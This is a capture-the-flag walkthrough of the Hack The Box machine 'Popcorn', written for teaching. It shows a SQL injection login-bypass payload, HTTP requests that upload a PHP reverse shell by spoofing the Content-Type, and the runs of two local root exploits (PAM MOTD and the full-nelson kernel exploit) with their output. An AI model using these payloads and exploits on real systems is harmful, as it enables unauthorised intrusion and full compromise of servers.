Summary

Popcorn is a medium Linux box that is probably on the edge of easy. It can be exploited through a SQL Injection authentication bypass after which you have administrative access to Torrent Hoster. This is vulnerable to file upload bypass and enables you to get a low privileged reverse shell. The PrivEsc can be done two ways, the intended way is to exploit motd.legal-displayed and the other way is through a kernel exploit.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn [ip]

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))

Since only HTTP and SSH are opened, it is likely the HTTP server that is vulnerable. A directory brute-force shows the following files/directories:

http://10.129.36.23/test (Status: 200)
http://10.129.36.23/index (Status: 200)
http://10.129.36.23/torrent (Status: 301)
http://10.129.36.23/rename (Status: 301)

The test is a PHPInfo page which can be used to gain some more information about the target application. The other interesting URL is torrent. This forwards you to this application:

Let’s check if the login is vulnerable to SQL Injection or something, intercept the request:

POST /torrent/login.php HTTP/1.1
Host: popcorn.htb
Origin: http://popcorn.htb
Referer: http://popcorn.htb/torrent/login.php
Cookie: /torrent/torrents.php=; /torrent/login.php=; PHPSESSID=743fa39f42c9a84f7959bd080df36c59

username='&password=pass

It was found that the username field is vulnerable as it shows this error message:

The error shows a verbose message:

SELECT userName, password, privilege, email
	FROM users
	WHERE userName = ''' AND password = '3590cb8af0bbb9e78c343b52b93773c9'

You can see the exact SQL command that is executed. This is vulnerable to the following payload as username:

' OR 1 -- -

When entering this as username you will be redirected to: Location: http://popcorn.htb/torrent/torrents.php

You now have access to the admin panel:


Exploitation

Throughout the application, two upload functionalities were found. One to upload torrents and one to upload screenshots for the respective torrents. The latter is exploitable. List the torrents and click on the already installed torrents:

You can edit the screenshot and it only accept images. Lets intercept this request and send this php reverse shell. The request is as follows:

POST /torrent/upload_file.php?mode=upload&id=723bc28f9b6f924cca68ccdff96b6190566ca6b4 HTTP/1.1
Host: popcorn.htb

Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/php

php-reverse-shell

This is not accepted and shows an error message since it is not a valid image file. However, you can change the content-type to image/png and bypass the upload restrictions:

POST /torrent/upload_file.php?mode=upload&id=723bc28f9b6f924cca68ccdff96b6190566ca6b4 HTTP/1.1
Host: popcorn.htb
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/png

php-reverse-shell [...] 
[...]

------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6.10
[...]

Nice, the shell is uploaded and the file upload restrictions were bypassed by changing the content-type. When you refresh the page you will see this:

When you click the image it will open a reverse shell as www-data, from here you have access to user.txt which is in george’s home directory.


Privilege Escalation

There are two methods, the intended method is noticing that a file named otd.legal-displayed is stored in the .cache. This is peculiar and when typing this into google, you will find this exploit. When transferred over to the box and executed you will obtain a root shell:

bash pam_motd.sh 
[*] Ubuntu PAM MOTD local root
[*] SSH key set up
[*] spawn ssh
[+] owned: /etc/passwd
[*] spawn ssh
[+] owned: /etc/shadow
[*] SSH key removed
[+] Success! Use password toor to get root
Password: 
root@popcorn:/dev/shm#

The other method is by running linux exploit suggester:

Possible Exploits:

[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson

   Details: http://vulnfactory.org/exploits/full-nelson.c
   Exposure: highly probable
   Tags: [ ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)} ],ubuntu=10.04{kernel:2.6.32-(21|24)-server}
   Download URL: http://vulnfactory.org/exploits/full-nelson.c

It finds this vulnerability and indicates it’s highly probably to work. Let’s also try it:

www-data@popcorn:/tmp$ gcc full-nelson.c exploit

www-data@popcorn:/tmp$ ./exploit 
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xf83cb280
 [+] Resolved econet_ops to 0xf83cb360
 [+] Resolved commit_creds to 0xc01645d0
 [+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# whoami
root

Conclusion

This was a really enjoyable box. It was quite fun to mess around with the web application and finding that uploading a torrent is not the way to go, instead you should look further and find the screenshot upload functionality. From here on onwards it is pretty straightforward. Especially when you use the kernel exploit. I think this should be an easy box but I believe that HTB’s older boxes are a lot easier than the current ones. I hope you enjoyed this writeup!